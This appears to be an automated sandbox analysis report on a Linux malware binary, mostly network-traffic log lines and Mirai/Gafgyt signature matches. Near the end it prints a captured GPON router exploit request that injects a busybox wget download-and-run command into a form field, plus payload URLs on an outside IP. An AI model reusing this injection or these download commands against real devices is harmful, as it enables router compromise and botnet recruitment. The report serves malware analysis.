    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39506
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
    Source: unknownNetwork traffic detected: HTTP traffic on port 35466 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39508
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
    Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40570
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39580
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
    Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
    Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40568
    Source: unknownNetwork traffic detected: HTTP traffic on port 38106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40562
    Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40560
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40566
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
    Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39572
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39576
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
    Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40558
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
    Source: unknownNetwork traffic detected: HTTP traffic on port 39444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40552
    Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40550
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
    Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
    Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39560
    Source: unknownNetwork traffic detected: HTTP traffic on port 36792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39562
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
    Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39566
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
    Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39568
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40548
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40546
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
    Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40540
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
    Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40544
    Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
    Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
    Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39550
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
    Source: unknownNetwork traffic detected: HTTP traffic on port 39432 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39552
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
    Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39556
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52502
    Source: unknownNetwork traffic detected: HTTP traffic on port 47498 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39558
    Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39548
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40536
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
    Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40530
    Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
    Source: unknownNetwork traffic detected: HTTP traffic on port 52850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45256 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40534
    Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40532
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
    Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40492
    Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40490
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
    Source: unknownNetwork traffic detected: HTTP traffic on port 44376 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
    Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52478
    Source: unknownNetwork traffic detected: HTTP traffic on port 56864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52482
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40486
    Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40484
    Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40488
    Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39490
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40482
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39492
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39496
    Source: unknownNetwork traffic detected: HTTP traffic on port 33236 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39498
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
    Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
    Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52494
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
    Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40474
    Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40472
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40478
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39482
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
    Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
    Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39486
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
    Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39488
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
    Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
    Source: unknownNetwork traffic detected: HTTP traffic on port 44388 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40464
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40462
    Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40466
    Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
    Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39470
    Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39472
    Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39474
    Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39476
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
    Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40458
    Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
    Source: unknownNetwork traffic detected: HTTP traffic on port 34116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40452
    Source: unknownNetwork traffic detected: HTTP traffic on port 33224 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40450
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
    Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40454
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
    Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52438
    Source: unknownNetwork traffic detected: HTTP traffic on port 55984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
    Source: unknownNetwork traffic detected: HTTP traffic on port 60892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
    Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46604 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52430
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
    Source: unknownNetwork traffic detected: HTTP traffic on port 34598 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52434
    Source: unknownNetwork traffic detected: HTTP traffic on port 40482 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43496 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
    Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
    Source: unknownNetwork traffic detected: HTTP traffic on port 40012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52442
    Source: unknownNetwork traffic detected: HTTP traffic on port 44352 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52440
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
    Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52446
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
    Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
    Source: unknownNetwork traffic detected: HTTP traffic on port 39804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33212 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34586 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
    Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46616 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52452
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
    Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52456
    Source: unknownNetwork traffic detected: HTTP traffic on port 56840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52460
    Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 62.52.58.31
    Source: unknownTCP traffic detected without corresponding DNS query: 62.99.117.89
    Source: unknownTCP traffic detected without corresponding DNS query: 62.200.43.147
    Source: unknownTCP traffic detected without corresponding DNS query: 62.119.96.239
    Source: unknownTCP traffic detected without corresponding DNS query: 62.227.142.137
    Source: unknownTCP traffic detected without corresponding DNS query: 62.41.199.197
    Source: unknownTCP traffic detected without corresponding DNS query: 62.144.152.126
    Source: unknownTCP traffic detected without corresponding DNS query: 62.34.85.71
    Source: unknownTCP traffic detected without corresponding DNS query: 62.218.13.247
    Source: unknownTCP traffic detected without corresponding DNS query: 62.101.65.96
    Source: unknownTCP traffic detected without corresponding DNS query: 62.183.92.105
    Source: unknownTCP traffic detected without corresponding DNS query: 62.56.117.227
    Source: unknownTCP traffic detected without corresponding DNS query: 62.136.168.208
    Source: unknownTCP traffic detected without corresponding DNS query: 62.24.227.166
    Source: unknownTCP traffic detected without corresponding DNS query: 62.214.146.95
    Source: unknownTCP traffic detected without corresponding DNS query: 62.166.249.226
    Source: unknownTCP traffic detected without corresponding DNS query: 62.215.161.166
    Source: unknownTCP traffic detected without corresponding DNS query: 62.142.205.183
    Source: unknownTCP traffic detected without corresponding DNS query: 62.247.50.5
    Source: unknownTCP traffic detected without corresponding DNS query: 62.98.156.58
    Source: unknownTCP traffic detected without corresponding DNS query: 62.67.215.144
    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.178.230
    Source: unknownTCP traffic detected without corresponding DNS query: 62.119.172.171
    Source: unknownTCP traffic detected without corresponding DNS query: 62.240.8.33
    Source: unknownTCP traffic detected without corresponding DNS query: 62.215.75.167
    Source: unknownTCP traffic detected without corresponding DNS query: 62.212.106.237
    Source: unknownTCP traffic detected without corresponding DNS query: 62.134.149.167
    Source: unknownTCP traffic detected without corresponding DNS query: 62.45.227.223
    Source: unknownTCP traffic detected without corresponding DNS query: 62.126.100.146
    Source: unknownTCP traffic detected without corresponding DNS query: 62.164.63.145
    Source: unknownTCP traffic detected without corresponding DNS query: 62.40.166.243
    Source: unknownTCP traffic detected without corresponding DNS query: 62.51.242.152
    Source: unknownTCP traffic detected without corresponding DNS query: 62.72.227.197
    Source: unknownTCP traffic detected without corresponding DNS query: 62.55.186.160
    Source: unknownTCP traffic detected without corresponding DNS query: 62.127.0.214
    Source: unknownTCP traffic detected without corresponding DNS query: 62.71.134.173
    Source: unknownTCP traffic detected without corresponding DNS query: 62.195.9.1
    Source: unknownTCP traffic detected without corresponding DNS query: 62.80.51.229
    Source: unknownTCP traffic detected without corresponding DNS query: 62.2.140.66
    Source: unknownTCP traffic detected without corresponding DNS query: 62.227.251.5
    Source: unknownTCP traffic detected without corresponding DNS query: 62.144.61.64
    Source: unknownTCP traffic detected without corresponding DNS query: 62.206.92.1
    Source: unknownTCP traffic detected without corresponding DNS query: 62.109.37.17
    Source: unknownTCP traffic detected without corresponding DNS query: 62.25.226.138
    Source: unknownTCP traffic detected without corresponding DNS query: 62.107.144.107
    Source: unknownTCP traffic detected without corresponding DNS query: 62.217.102.166
    Source: unknownTCP traffic detected without corresponding DNS query: 62.126.38.124
    Source: unknownTCP traffic detected without corresponding DNS query: 62.220.208.22
    Source: unknownTCP traffic detected without corresponding DNS query: 62.71.195.149
    Source: unknownTCP traffic detected without corresponding DNS query: 62.191.106.21
    Source: m1vvw0vLkD.elf, 5516.1.0000000000400000.0000000000411000.r-x.sdmpString found in binary or memory: http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
    Source: m1vvw0vLkD.elf, 5516.1.0000000000400000.0000000000411000.r-x.sdmpString found in binary or memory: http://45.88.90.129/bins/Rakitin.sh
    Source: m1vvw0vLkD.elfString found in binary or memory: http://upx.sf.net
    Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 38 38 2e 39 30 2e 31 32 39 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

    System Summary

    barindex
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
    Source: 5516.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
    Source: 5511.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
